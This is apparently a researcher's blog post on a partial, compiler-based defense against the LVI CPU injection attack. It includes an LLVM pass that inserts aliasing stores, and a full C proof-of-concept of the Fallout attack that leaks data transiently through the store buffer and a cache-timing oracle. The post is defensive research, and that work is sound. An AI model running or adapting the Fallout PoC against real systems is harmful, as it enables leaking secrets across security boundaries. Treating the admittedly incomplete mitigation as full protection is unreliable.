Bad Bodyguard: How I failed defending against LVI

Recently there has been a lot of research on microarchitectural attacks against the Intel CPU family. Some of these attacks rely on uarch buffers of specific microarchitectures (RIDL, Fallout, ZombieLoad, LVI). These attacks are collectively referred to as "MDS" (Microarchitectural Data Sampling). LVI was the latest of them (I do not count CrossTalk and CacheOut/SGAxe as separate attacks, because they are advanced variants of RIDL) and, unlike the previous attacks (which primarily targeted data leakage), it specifically targets data injection into the victim's security domain. The authors of the original paper and the CPU vendor suggested a compiler patch (for GCC), which inserts an LFENCE after each load to prevent uarch injection into that load. I am not going to explain how LVI works; you can always read the paper.

What I focus on here is a cheap (but not 100% effective) defense against LVI. LVI relies on different primitives to perform an injection (store-to-load forwarding, LFB entry fetch, Load Buffer entry fetch), which means the source of the uarch leak could be any of the uarch buffers. However, we noted that in practice, whenever the conditions for store-to-load forwarding are met, there is no other leak (the only leak comes from the Store Buffer). We cannot confirm that there is any sort of priority in the uarch data flow by design, but empirically it very much looks like that.

So, the idea of defending against LVI is based on the assumption that we know how the uarch data flow is prioritized: if, at the time of an assisted (faulting) load, there is a prior store in the Store Buffer whose STA (store address) field matches in the lowest 12 bits (this is called page aliasing), the Store Buffer becomes the source of the injection.
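For reference, "lowest 12 bits match" just means the two virtual addresses share the same 4 KiB page offset. A minimal check (the helper name is mine) looks like this:

#include <stdint.h>
#include <stdbool.h>

/* Two addresses "page-alias" when their lowest 12 bits (the 4 KiB page offset)
   are equal - the condition under which the Store Buffer entry can become the
   source of the injection. */
static inline bool page_alias(const void *a, const void *b) {
    return ((uintptr_t)a & 0xfff) == ((uintptr_t)b & 0xfff);
}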

So the solution is very simplistic: let's put benign store instructions into the code, so that these stores become the source of the leak (like a bodyguard :)) for any uarch injection. There are two approaches here:

  • Support each store in the existing code with a store to a page-aliased address. This approach specifically targets the LVI threat model: we assume that on a context switch (to another address space or into an SGX enclave) the uarch buffers are drained by the microcode patch (VERW, EENTER, EEXIT). The LVI authors therefore rely on uarch poisoning from inside the victim's space: the victim has to bring attacker-controlled data into one of the buffers, and that value is then incorrectly passed to some instruction transiently during a microcode assist. So, if we instrument each store instruction and add a new store into a separate data section, but with the same lowest 12 bits, we eliminate leaks from the Store Buffer with high probability. The problem is a possible race: the STA and STD of the original store may already be committed while the STA or STD of the instrumented store is not yet, so the original data can still leak.

  • Support each load instruction with a store to an aliasing address. We instrument each load so that it is preceded by a store into an aliasing location. The advantage of this approach is that we basically turn most leaks through the load into Store-to-Leak behaviour, since it is prioritized (according to our assumption); hence there will be no leakage from the LFB or the Load Buffer with high probability. The problem is that the store and the following load can be reordered, and when they execute concurrently it may happen that, during the ucode assist of the load, the STA and STD entries of the store are not yet valid; in that situation no benign leak can happen. (A sketch of the emitted sequence follows after this list.)

    Neither of the presented approaches defends against LVI 100%, but they raise the bar and make LVI much harder in practice. To show that this is the case, I present a minimalistic proof-of-concept implementation of such instrumentation in LLVM (source code below). But don't expect this code to run out of the box: I was experimenting with it some time ago and might have forgotten to change something. I experimented on Skylake (Intel Core i7-6700K).
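Before diving into the pass, here is a C-level sketch of the "bodyguard" sequence it emits (before a protected load in the Load-to-Leak variant, or after a protected store in the Store-to-Store variant). The helper name is mine; the pass emits the equivalent instructions inline, with R15 as a scratch register and __llvm_store_store_shadow_area as the shadow page (see the linking note after the pass):

#include <stdint.h>

/* Shadow area the instrumented stores land in; defined at link time via the
   .comm directive shown further below. */
extern char __llvm_store_store_shadow_area[8192];

/* Roughly what the pass emits: an aliasing store (same low 12 bits as the
   protected memory access), an SFENCE, and a second store one cache line
   further, masked back into the page. */
static inline void bodyguard_store(const volatile void *access_addr) {
    uintptr_t off = (uintptr_t)access_addr & 0xfff;   /* page offset     */
    *(volatile uint64_t *)(__llvm_store_store_shadow_area + off) = ~0ULL;
    __asm__ __volatile__("sfence" ::: "memory");
    off = (off + 64) & 0xfff;                         /* next cache line */
    *(volatile uint64_t *)(__llvm_store_store_shadow_area + off) = ~0ULL;
}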

LLVM Backend Pass:
#include "X86.h"
#include "X86InstrBuilder.h"
#include "X86InstrInfo.h"
#include "X86Subtarget.h"
#include "llvm/ADT/ArrayRef.h"
#include "llvm/ADT/DenseMap.h"
#include "llvm/ADT/Optional.h"
#include "llvm/ADT/STLExtras.h"
#include "llvm/ADT/ScopeExit.h"
#include "llvm/ADT/SmallPtrSet.h"
#include "llvm/ADT/SmallSet.h"
#include "llvm/ADT/SmallVector.h"
#include "llvm/ADT/SparseBitVector.h"
#include "llvm/ADT/Statistic.h"
#include "llvm/ExecutionEngine/SectionMemoryManager.h"
#include "llvm/CodeGen/MachineBasicBlock.h"
#include "llvm/CodeGen/MachineConstantPool.h"
#include "llvm/CodeGen/MachineFunction.h"
#include "llvm/CodeGen/MachineFunctionPass.h"
#include "llvm/CodeGen/MachineInstr.h"
#include "llvm/CodeGen/MachineInstrBuilder.h"
#include "llvm/CodeGen/MachineModuleInfo.h"
#include "llvm/CodeGen/MachineOperand.h"
#include "llvm/CodeGen/MachineRegisterInfo.h"
#include "llvm/CodeGen/MachineSSAUpdater.h"
#include "llvm/CodeGen/TargetInstrInfo.h"
#include "llvm/CodeGen/TargetRegisterInfo.h"
#include "llvm/CodeGen/TargetSchedule.h"
#include "llvm/CodeGen/TargetSubtargetInfo.h"
#include "llvm/IR/DebugLoc.h"
#include "llvm/MC/MCSchedule.h"
#include "llvm/Pass.h"
#include "llvm/Support/CommandLine.h"
#include "llvm/Support/Debug.h"
#include "llvm/Support/raw_ostream.h"
#include <algorithm>
#include <cassert>
#include <iterator>
#include <utility>

#define X86_CACHELINE_SIZE (64L)
using namespace llvm;

#define PASS_KEY "x86-strstr"
#define DEBUG_TYPE PASS_KEY

sys::MemoryBlock SpeculativeMemoryEraserBlock;

static cl::opt<bool> StoreToLeak(
    "x86-loadtoleak", cl::Hidden,
    cl::desc("X86: Load-to-Leak hardening; otherwise Store-To-Leak."), cl::init(false));


static cl::opt<bool> LVI_mitigation(
    "x86-lviprotect", cl::Hidden,
    cl::desc("X86: Mitigate against LVI attack"), cl::init(false));
namespace {

class X86StoreStore : public MachineFunctionPass {
public:

const X86Subtarget *Subtarget;
  MachineRegisterInfo *MRI;
  const X86InstrInfo *TII;
  const TargetRegisterInfo *TRI;

  X86StoreStore() : MachineFunctionPass(ID) {
      std::error_code EC;
      SpeculativeMemoryEraserBlock = sys::Memory::allocateMappedMemory(
        4096, nullptr, sys::Memory::MF_READ | sys::Memory::MF_WRITE, EC);
      if (EC)
        report_fatal_error("X86StoreStore: failed to allocate shadow memory block");
      // vaddr_base = SectionMemoryManager::allocateSection(SectionMemoryManager::AllocationPurpose::RWData, 4096, 4096);
  }

  StringRef getPassName() const override {
    return "X86 stored stores";
  }
  bool runOnMachineFunction(MachineFunction &MF) override;

  /// Pass identification, replacement for typeid.
  static char ID;
// public:
  uint64_t vaddr_base;
  void visitMovInstr(MachineInstr* MI, MachineFunction &MF);
  void visitMovInstr2(MachineInstr* MI, MachineFunction &MF);
  void visitCall(MachineInstr* MI, MachineFunction &MF);
  void visitReturn(MachineInstr* MI, MachineFunction &MF);
  bool mayReadMemory(const MachineInstr& MI){
    return MI.mayLoad() && (MI.isMoveImmediate() || MI.isMoveReg() || isStackLoad(MI)); //|| isPush(MI) || MI.isInlineAsm();
  }

  bool mayModifyMemory(const MachineInstr& MI){
    return MI.mayStore() && (MI.isMoveImmediate() || MI.isMoveReg() || isStackStore(MI)); //|| isPush(MI) || MI.isInlineAsm();
  }

  bool isStackStore(const MachineInstr& MI){
    switch(MI.getOpcode()){
      case X86::PUSH16i8:
      case X86::PUSH16r:
      case X86::PUSH16rmm:
      case X86::PUSH16rmr:
      case X86::PUSH32i8:
      case X86::PUSH32r:
      case X86::PUSH32rmm:
      case X86::PUSH32rmr:
      case X86::PUSH64i32:
      case X86::PUSH64i8:
      case X86::PUSH64r:
      case X86::PUSH64rmm:
      case X86::PUSH64rmr:
      case X86::PUSHA16:
      case X86::PUSHA32:
      case X86::PUSHCS16:
      case X86::PUSHCS32:
      case X86::PUSHDS16:
      case X86::PUSHDS32:
      case X86::PUSHES16:
      case X86::PUSHES32:
      case X86::PUSHF16:
      case X86::PUSHF32:
      case X86::PUSHF64:
      case X86::PUSHFS16:
      case X86::PUSHFS32:
      case X86::PUSHFS64:
      case X86::PUSHGS16:
      case X86::PUSHGS32:
      case X86::PUSHGS64:
      case X86::PUSHSS16:
      case X86::PUSHSS32:
      case X86::PUSHi16:
      case X86::PUSHi32:
        return true;
      default:
        return false;
    }
  }

  bool isStackLoad(const MachineInstr& MI){
    switch(MI.getOpcode()){
      case X86::POP16r:
      case X86::POP16rmm:
      case X86::POP16rmr:
      case X86::POP32r:
      case X86::POP32rmm:
      case X86::POP32rmr:
      case X86::POP64r:
      case X86::POP64rmm:
      case X86::POP64rmr:
      case X86::POPA16:
      case X86::POPA32:
      case X86::POPDS16:
      case X86::POPDS32:
      case X86::POPES16:
      case X86::POPES32:
      case X86::POPF16:
      case X86::POPF32:
      case X86::POPF64:
      case X86::POPFS16:
      case X86::POPFS32:
      case X86::POPFS64:
      case X86::POPGS16:
      case X86::POPGS32:
      case X86::POPGS64:
      case X86::POPSS16:
      case X86::POPSS32:
        return true;
      default:
        return false;
    }
  }

};

} // end anonymous namespace



static void (X86StoreStore::*instrumentation)(MachineInstr* MI, MachineFunction &MF) = &X86StoreStore::visitMovInstr;
static bool (X86StoreStore::*needsInstrumentation)(const MachineInstr& MI) = &X86StoreStore::mayModifyMemory;
static bool (X86StoreStore::*isStackInstr)(const MachineInstr &MI) = &X86StoreStore::isStackStore;
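// The defaults above select the Store-to-Store variant (instrument stores);
// runOnMachineFunction switches them to the load-instrumenting variant when
// -x86-loadtoleak is set.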

char X86StoreStore::ID = 0;
bool X86StoreStore::runOnMachineFunction(
    MachineFunction &MF) {
  LLVM_DEBUG(dbgs() << "********** " << getPassName() << " : " << MF.getName()
                    << " **********\n");
  Subtarget = &MF.getSubtarget<X86Subtarget>();
  TII = Subtarget->getInstrInfo();
  MRI = &MF.getRegInfo();
  bool firstInstr = true;
  std::vector<MachineInstr*> vectr;
  if(!LVI_mitigation)
    return false;
  if(StoreToLeak){
    instrumentation = &X86StoreStore::visitMovInstr2;
    needsInstrumentation = &X86StoreStore::mayReadMemory;
    isStackInstr = &X86StoreStore::isStackLoad;
  }


  // BuildMI(*MF.begin(), (*MF.begin()).begin(), DebugLoc(), TII->get(X86::XCHG64rm), UndefReg)
  // .addExternalSymbol(/* disp */"__llvm_store_store_shadow_area"); // function starts with lfence
  for(auto& MBB : MF){
    for(auto& MI : MBB){
      SmallVector<const MachineMemOperand *, 1> accss;
      if((this->*(needsInstrumentation))(MI) || MI.isReturn() || MI.isCall()) vectr.push_back(&MI);
      firstInstr = false;
    }
  }

  for(auto *MI : vectr){
    // if((this->*(isMoveInstr))(*MI)){
      if(MI->isCall())
        visitCall(MI, MF);
      else if(MI->isReturn())
        visitReturn(MI, MF);
      else
        (this->*(instrumentation))(MI, MF);
    // BuildMI(*(MI->getParent()), std::next(MI->getIterator()), DebugLoc(), TII->get(X86::LFENCE));
    // }
  }
  return true;
}



void X86StoreStore::visitCall(MachineInstr* MI, MachineFunction &MF){
  int MemOpOffset = X86II::getMemoryOperandNo(MI->getDesc().TSFlags);
  unsigned Bias = X86II::getOperandBias(MI->getDesc());
  Register UndefReg = X86::R15; //MRI->createVirtualRegister(&X86::GR64RegClass);
  MachineInstrBuilder MIB;
  return; // NOTE: call-site instrumentation is disabled by this early return
  if(MemOpOffset < 0) return; // direct call, no memory operand - let's not change anything
  MemOpOffset += Bias;
  BuildMI(*(MI->getParent()), MI->getIterator(), DebugLoc(), TII->get(X86::LEA64r), UndefReg)
      .addReg(MI->getOperand(MemOpOffset + X86::AddrBaseReg).getReg())
      .addImm(MI->getOperand(MemOpOffset + X86::AddrScaleAmt).getImm())
      .addReg(MI->getOperand(MemOpOffset + X86::AddrIndexReg).getReg())
      .addImm(MI->getOperand(MemOpOffset + X86::AddrDisp).getImm())
      .addReg(MI->getOperand(MemOpOffset + X86::AddrSegmentReg).getReg());



  BuildMI(*(MI->getParent()), MI->getIterator(), DebugLoc(), TII->get(X86::AND64ri32), UndefReg)
  .addReg(UndefReg)
  .addImm(0xFFF);

  BuildMI(*(MI->getParent()), MI->getIterator(), DebugLoc(), TII->get(X86::MOV64mi32))
  .addReg(/* base */ UndefReg)
  .addImm(/* scale */ 1)
  .addImm(/* index */ 0)
  .addExternalSymbol(/* disp */"__llvm_store_store_shadow_area")
  .addImm(/* segment */ 0)
  .addImm(0xFFFFFFFF);

  BuildMI(*(MI->getParent()), MI->getIterator(), DebugLoc(), TII->get(X86::SFENCE));

  // Second write must not trigger page aliasing
  BuildMI(*(MI->getParent()), MI->getIterator(), DebugLoc(), TII->get(X86::ADD64ri32), UndefReg)
  .addReg(UndefReg)
  .addImm(X86_CACHELINE_SIZE);
  BuildMI(*(MI->getParent()), MI->getIterator(), DebugLoc(), TII->get(X86::AND64ri32), UndefReg)
  .addReg(UndefReg)
  .addImm(0xFFF);

  BuildMI(*(MI->getParent()), MI->getIterator(), DebugLoc(), TII->get(X86::MOV64mi32))
  .addReg(/* base */ UndefReg)
  .addImm(/* scale */ 1)
  .addImm(/* index */ 0)
  .addExternalSymbol(/* disp */"__llvm_store_store_shadow_area2")
  .addImm(/* segment */ 0)
  .addImm(0xFFFFFFFF);

};


void X86StoreStore::visitReturn(MachineInstr* MI, MachineFunction &MF){
  Register UndefReg = X86::R15; //MRI->createVirtualRegister(&X86::GR64RegClass);
  MachineInstrBuilder MIB;

  MIB = BuildMI(*(MI->getParent()), MI->getIterator(), DebugLoc(), TII->get(X86::LEA64r), UndefReg)
      .addReg(X86::RSP)
      .addImm(1)
      .addImm(0)
      .addImm(-8)
      .addImm(0);



  BuildMI(*(MI->getParent()), MI->getIterator(), DebugLoc(), TII->get(X86::AND64ri32), UndefReg)
  .addReg(UndefReg)
  .addImm(0xFFF);

  BuildMI(*(MI->getParent()), MI->getIterator(), DebugLoc(), TII->get(X86::MOV64mi32))
  .addReg(/* base */ UndefReg)
  .addImm(/* scale */ 1)
  .addImm(/* index */ 0)
  .addExternalSymbol(/* disp */"__llvm_store_store_shadow_area")
  .addImm(/* segment */ 0)
  .addImm(0xFFFFFFFF);

  BuildMI(*(MI->getParent()), MI->getIterator(), DebugLoc(), TII->get(X86::SFENCE));

  // Second write must not trigger page aliasing
  BuildMI(*(MI->getParent()), MI->getIterator(), DebugLoc(), TII->get(X86::ADD64ri32), UndefReg)
  .addReg(UndefReg)
  .addImm(X86_CACHELINE_SIZE);
  BuildMI(*(MI->getParent()), MI->getIterator(), DebugLoc(), TII->get(X86::AND64ri32), UndefReg)
  .addReg(UndefReg)
  .addImm(0xFFF);

  BuildMI(*(MI->getParent()), MI->getIterator(), DebugLoc(), TII->get(X86::MOV64mi32))
  .addReg(/* base */ UndefReg)
  .addImm(/* scale */ 1)
  .addImm(/* index */ 0)
  .addExternalSymbol(/* disp */"__llvm_store_store_shadow_area")
  .addImm(/* segment */ 0)
  .addImm(0xFFFFFFFF);

};

// Store-to-Store variant: the aliasing shadow stores are inserted *after* the
// protected store instruction.
void X86StoreStore::visitMovInstr(MachineInstr* MI, MachineFunction &MF){
  int MemOpOffset = X86II::getMemoryOperandNo(MI->getDesc().TSFlags);
  unsigned Bias = X86II::getOperandBias(MI->getDesc());
  Register UndefReg = X86::R15; //MRI->createVirtualRegister(&X86::GR64RegClass);
  MachineInstrBuilder MIB;
  if(MemOpOffset >= 0)
    MemOpOffset += Bias;
  if(!(this->*(isStackInstr))(*MI)){
    if(MemOpOffset < 0) return; // no explicit memory operand - let's not change anything
    MIB = BuildMI(*(MI->getParent()), std::next(MI->getIterator()), DebugLoc(), TII->get(X86::LEA64r), UndefReg)
        .addReg(MI->getOperand(MemOpOffset + X86::AddrBaseReg).getReg())
        .addImm(MI->getOperand(MemOpOffset + X86::AddrScaleAmt).getImm())
        .addReg(MI->getOperand(MemOpOffset + X86::AddrIndexReg).getReg())
        .addImm(MI->getOperand(MemOpOffset + X86::AddrDisp).getImm())
        .addReg(MI->getOperand(MemOpOffset + X86::AddrSegmentReg).getReg());
  } else {
  MIB = BuildMI(*(MI->getParent()), std::next(MI->getIterator()), DebugLoc(), TII->get(X86::LEA64r), UndefReg)
        .addReg(X86::RSP)
        .addImm(1)
        .addImm(0)
        .addImm(-8)
        .addImm(0);
  }
  MIB = BuildMI(*(MI->getParent()), std::next(MIB.getInstr()->getIterator()), DebugLoc(), TII->get(X86::AND64ri32), UndefReg)
  .addReg(UndefReg)
  .addImm(0xFFF);

  MIB = BuildMI(*(MI->getParent()), std::next(MIB.getInstr()->getIterator()), DebugLoc(), TII->get(X86::MOV64mi32))
  .addReg(/* base */ UndefReg)
  .addImm(/* scale */ 1)
  .addImm(/* index */ 0)
  .addExternalSymbol(/* disp */"__llvm_store_store_shadow_area")
  .addImm(/* segment */ 0)
  .addImm(0xFFFFFFFF);

  MIB = BuildMI(*(MI->getParent()), std::next(MIB.getInstr()->getIterator()), DebugLoc(), TII->get(X86::SFENCE));

  // Second write must not trigger page aliasing
  MIB = BuildMI(*(MI->getParent()), std::next(MIB.getInstr()->getIterator()), DebugLoc(), TII->get(X86::ADD64ri32), UndefReg)
  .addReg(UndefReg)
  .addImm(X86_CACHELINE_SIZE);
  MIB = BuildMI(*(MI->getParent()), std::next(MIB.getInstr()->getIterator()), DebugLoc(), TII->get(X86::AND64ri32), UndefReg)
  .addReg(UndefReg)
  .addImm(0xFFF);

  BuildMI(*(MI->getParent()), std::next(MIB.getInstr()->getIterator()), DebugLoc(), TII->get(X86::MOV64mi32))
  .addReg(/* base */ UndefReg)
  .addImm(/* scale */ 1)
  .addImm(/* index */ 0)
  .addExternalSymbol(/* disp */"__llvm_store_store_shadow_area")
  .addImm(/* segment */ 0)
  .addImm(0xFFFFFFFF);

}


// Load-to-Leak variant: the aliasing shadow stores are inserted *before* the
// protected load instruction.
void X86StoreStore::visitMovInstr2(MachineInstr* MI, MachineFunction &MF){
  int MemOpOffset = X86II::getMemoryOperandNo(MI->getDesc().TSFlags);
  unsigned Bias = X86II::getOperandBias(MI->getDesc());
  Register UndefReg = X86::R15; //MRI->createVirtualRegister(&X86::GR64RegClass);
  MachineInstrBuilder MIB;
  if(MemOpOffset >= 0)
    MemOpOffset += Bias;
  if(!(this->*(isStackInstr))(*MI)){
    if(MemOpOffset < 0) return; // no explicit memory operand - let's not change anything
    BuildMI(*(MI->getParent()), MI->getIterator(), DebugLoc(), TII->get(X86::LEA64r), UndefReg)
        .addReg(MI->getOperand(MemOpOffset + X86::AddrBaseReg).getReg())
        .addImm(MI->getOperand(MemOpOffset + X86::AddrScaleAmt).getImm())
        .addReg(MI->getOperand(MemOpOffset + X86::AddrIndexReg).getReg())
        .addImm(MI->getOperand(MemOpOffset + X86::AddrDisp).getImm())
        .addReg(MI->getOperand(MemOpOffset + X86::AddrSegmentReg).getReg());
  } else {
    MIB = BuildMI(*(MI->getParent()), MI->getIterator(), DebugLoc(), TII->get(X86::LEA64r), UndefReg)
        .addReg(X86::RSP)
        .addImm(1)
        .addImm(0)
        .addImm(-8)
        .addImm(0);
  }


  BuildMI(*(MI->getParent()), MI->getIterator(), DebugLoc(), TII->get(X86::AND64ri32), UndefReg)
  .addReg(UndefReg)
  .addImm(0xFFF);

  BuildMI(*(MI->getParent()), MI->getIterator(), DebugLoc(), TII->get(X86::MOV64mi32))
  .addReg(/* base */ UndefReg)
  .addImm(/* scale */ 1)
  .addImm(/* index */ 0)
  .addExternalSymbol(/* disp */"__llvm_store_store_shadow_area")
  .addImm(/* segment */ 0)
  .addImm(0xFFFFFFFF);

  BuildMI(*(MI->getParent()), MI->getIterator(), DebugLoc(), TII->get(X86::SFENCE));

  // Second write must not trigger page aliasing
  BuildMI(*(MI->getParent()), MI->getIterator(), DebugLoc(), TII->get(X86::ADD64ri32), UndefReg)
  .addReg(UndefReg)
  .addImm(X86_CACHELINE_SIZE);
  BuildMI(*(MI->getParent()), MI->getIterator(), DebugLoc(), TII->get(X86::AND64ri32), UndefReg)
  .addReg(UndefReg)
  .addImm(0xFFF);

  BuildMI(*(MI->getParent()), MI->getIterator(), DebugLoc(), TII->get(X86::MOV64mi32))
  .addReg(/* base */ UndefReg)
  .addImm(/* scale */ 1)
  .addImm(/* index */ 0)
  .addExternalSymbol(/* disp */"__llvm_store_store_shadow_area")
  .addImm(/* segment */ 0)
  .addImm(0xFFFFFFFF);
}

INITIALIZE_PASS_BEGIN(X86StoreStore, PASS_KEY,
                      "X86 stored stores", false, false)

INITIALIZE_PASS_END(X86StoreStore, PASS_KEY,
                    "X86 stored stores", false, false)


FunctionPass *llvm::createX86StoreStorePass() {
  return new X86StoreStore();
}

Note: I reserved the GPR R15 for this instrumentation. You also have to link your code with something like this:

.comm __llvm_store_store_shadow_area, 8192, 4096
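If you prefer not to write the assembler directive by hand, defining the same symbol from a C translation unit works just as well (an equivalent sketch; name, size, and alignment must match what the pass references). The pass itself is gated by its -x86-lviprotect flag (and -x86-loadtoleak for the load variant), which can be passed to the backend, e.g. via clang's -mllvm.

/* Equivalent of the .comm directive above: the shadow area the instrumented
   "bodyguard" stores write into. */
__attribute__((aligned(4096)))
char __llvm_store_store_shadow_area[8192];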

Results: To test it I used a simple PoC of the Fallout attack (source code below):

#include <stdlib.h>
#include <stdio.h>
#include <immintrin.h>
#include <sys/time.h>
#include <stdint.h>
#include <time.h>
#include <string.h>
#include <sched.h>
#include <unistd.h>
#include <x86intrin.h>
#include <sys/mman.h>
#include <fcntl.h>
#define __USE_GNU
#include <signal.h>
#include <ucontext.h>
#define PG_SIZE (4096U*1)
/* Experiment knobs: the exact values were not in the original listing; these
   are assumptions filled in so the PoC compiles. */
#define STORE_BUFFER_ENTRIES 56   /* Skylake store buffer size */
#define NUM_ROUNDS 1000
#define NUM_EXPR 10

volatile char *oraclearr;
volatile char *shdworaclearr;
volatile unsigned *tmp_store;
volatile unsigned char* addr1;
volatile unsigned char* addr2;
volatile unsigned char* addr3;

int tlb_fd;
int shadow_offset[1024];
const int offset = 0xfa;
int shift = 0;
volatile unsigned char store_buffer[4096*STORE_BUFFER_ENTRIES] __attribute__((aligned(4096)));
uint64_t averg[256];
int64_t averg_rnd[256];

void tlb_flush_all(){
    pwrite(tlb_fd, 0x0, 100, 0x0);
}

void clear_accessed_bit(void* vaddr){
    pwrite(tlb_fd, vaddr, 100, 0x0);
}

static inline void clflush(void* addr){
    // __asm__ __volatile__ ("\tclflush (%0)\n"::"r"(addr));
    asm volatile("\tclflush (%0)\n" : :"r"(addr) : "memory");
}

/* The Fallout gadget: the store to addr1[offset] creates the Store Buffer
   entry whose data is transiently forwarded to the assisted load from
   addr2[offset] below (addr1 and addr2 page-alias). */
void __attribute__((optimize("-O0"))) void_operations3(volatile char* a, volatile unsigned char* b){
    addr1[offset] = 0xe1; // injection
    oraclearr[PG_SIZE * addr3[offset]];
    oraclearr[PG_SIZE * addr3[offset]];
    oraclearr[PG_SIZE * addr2[offset]]; // access to addr2 is ucode-assisted
    oraclearr[PG_SIZE * addr2[offset]];

};

static unsigned long long rdtscp() {
    unsigned long long a, d;
    asm volatile ("rdtscp" : "=a" (a), "=d" (d) : : "rcx");
    a = (d<<32) | a;
    return a;
}

uint64_t time_access(volatile void* add){
    uint64_t t1, t2;
    volatile char *f = (volatile char*)add;
    // for(int i=0; i < 12; ++i)sched_yield();
    t1 = rdtscp();
    *f;
    t2 = rdtscp();
    return (t2 - t1);
}

int __attribute__((optimize("-O0"))) main(void){
    register char loaded_val;
    volatile char *f;
    int64_t a = 100000000,b = 100;

    addr1 = (volatile unsigned char*)(((uint64_t)malloc(200*PG_SIZE) + PG_SIZE) & ~0xFFF );
    addr2 = (volatile unsigned char*)(((uint64_t)malloc(200*PG_SIZE) + PG_SIZE) & ~0xFFF );
    addr3 = (volatile unsigned char*)(((uint64_t)malloc(200*PG_SIZE) + PG_SIZE) & ~0xFFF );
    tlb_fd = open("/dev/tlb_invalidator", O_WRONLY, 0x0);
    if(tlb_fd == -1){
        printf("FILE DOESNT EXIST\n");
    return 1;
    }
    oraclearr = malloc(sizeof(char) * PG_SIZE*1024);
    // EVERYTHING IS INITIALIZED
experiments_:
    // printf("Running experiments\n");
    memset(averg_rnd, 0x0, 256*sizeof(int64_t));
    memset(averg, 0x0, 256*sizeof(uint64_t));
    memset((void*)oraclearr, 0x1,  PG_SIZE*1024);

    addr3[offset] = 0x34;
    addr2[offset] = 0x34;
    addr1[offset] = 0xf1;
    for(int rnd_i = 0; rnd_i < NUM_ROUNDS; ++rnd_i){
        memset(averg, 0x0, 256*sizeof(uint64_t));
        for(int i = 0; i < NUM_EXPR; ++i){
            // evict_full_cache();
            int flag = 0;
            shift = 0;
            for(unsigned int j = 0; j < 256; ++j){
                asm volatile("\tclflush (%0)\n"::"r"((void*)&oraclearr[PG_SIZE * j]));
            }

            clear_accessed_bit((void*)&addr2[offset]);
            asm volatile("\tclflush (%0)\n"::"r"((void*)&addr2[offset]));
            tlb_flush_all();
            void_operations3((volatile char*)&a, (volatile unsigned char*)&b);
            for(unsigned int j = 0; j < 256; ++j){
                averg[j] += time_access((void*)(oraclearr + PG_SIZE * j));
            }
        }
        uint64_t min = (uint64_t)-1;
        int minid = -1;
        for(int rn = 0; rn < 256; ++rn){
            if((averg[rn]/NUM_EXPR) <= (min - 1) && rn > 0 && rn != addr3[offset]){
                min = averg[rn]/NUM_EXPR;
                minid = rn;
            }
        }
        ++averg_rnd[minid];
    }
    int winner;
    int64_t winner_max = -1;
    int64_t winner_min = 0xfffffffe;
    for(int i = 0; i < 256; ++i){
        if(averg_rnd[i] > winner_max){
            winner_max = averg_rnd[i];
            winner = i;
        }
        if(averg_rnd[i] < winner_min){
            winner_min = averg_rnd[i];
        }
    }
    if(averg[winner]>= 200) {
        goto experiments_;
    }
    printf("0x%02x\n", winner, winner);
    return 1;
}

The current PoC targets leaking a secret from the same address space (just like the LVI case, where the victim process/enclave handles user-controlled data and then transiently injects it somewhere). I am not going to explain how Fallout works, but briefly: the injection happens in the void_operations3 function. When we write to addr1[offset], we create a Store Buffer entry for that address. Later we dereference addr2[offset]; since it is an aliasing address and the access needs a ucode assist (because we clear the accessed bit and flush the TLB), the load has to be re-dispatched. However, the first dispatch of the load is fed with the content of the latest store to addr1[offset] (wow), because the lowest 12 bits of the addresses match. If we instrument this code with our pass, each load is now accompanied by a different store. Let's compare the leak rate of both versions (instrumented and not instrumented):

not-instrumented code    instrumented code
917/1000                 0/1000

In the second case (instrumented code) I actually observed the benign value (the one we inject intentionally) being leaked in 926/1000 rounds. I performed 10 full runs per case and took the average (with the instrumented code, I never saw the application data leak).

You may notice that in this example I use Store-to-Leak to beat Store-to-Leak behaviour. What about LFB and Load Buffer leaks? As you can see, with this instrumentation there is almost no leak from the other sources; it is (almost) always the Store Buffer that passes the value transiently.

I do not do any deep performance benchmarking here. It is fairly obvious that accompanying each load with a store is cheaper than an LFENCE, especially a store to a location that is very likely to be in L1: since all accesses fall within a single page (we have only one page for page aliasing), the L1 hardware prefetcher also helps here. A microbenchmark (a tight loop with loads) shows it is 3-4 times faster than the LFENCE variant.
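For reference, here is a rough reconstruction of that kind of microbenchmark (the buffer names, sizes, and iteration count are mine, and the bodyguard loop is simplified to a single aliasing store per load):

#include <stdint.h>
#include <stdio.h>
#include <x86intrin.h>

#define ITERS (1u << 24)

static char data[4096]   __attribute__((aligned(4096)));
static char shadow[8192] __attribute__((aligned(4096)));

/* Tight loop of loads, each followed by an LFENCE (the compiler-patch style). */
static uint64_t bench_lfence(void) {
    unsigned aux;
    uint64_t t0 = __rdtscp(&aux);
    for (unsigned i = 0; i < ITERS; ++i) {
        volatile char *p = &data[i & 0xfff];
        (void)*p;
        _mm_lfence();
    }
    return __rdtscp(&aux) - t0;
}

/* Same loop, but each load is preceded by an aliasing "bodyguard" store. */
static uint64_t bench_bodyguard(void) {
    unsigned aux;
    uint64_t t0 = __rdtscp(&aux);
    for (unsigned i = 0; i < ITERS; ++i) {
        volatile char *p = &data[i & 0xfff];
        *(volatile uint64_t *)(shadow + ((uintptr_t)p & 0xfff)) = ~0ULL;
        (void)*p;
    }
    return __rdtscp(&aux) - t0;
}

int main(void) {
    printf("lfence:    %llu cycles\n", (unsigned long long)bench_lfence());
    printf("bodyguard: %llu cycles\n", (unsigned long long)bench_bodyguard());
    return 0;
}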

As I mentioned, this is not a 100% way to defend your application against LVI, but it definitely makes it harder to inject attacker-controlled data into the victim's space.

References

I am lazy, so you can look up all the MDS papers here: MDS Attacks
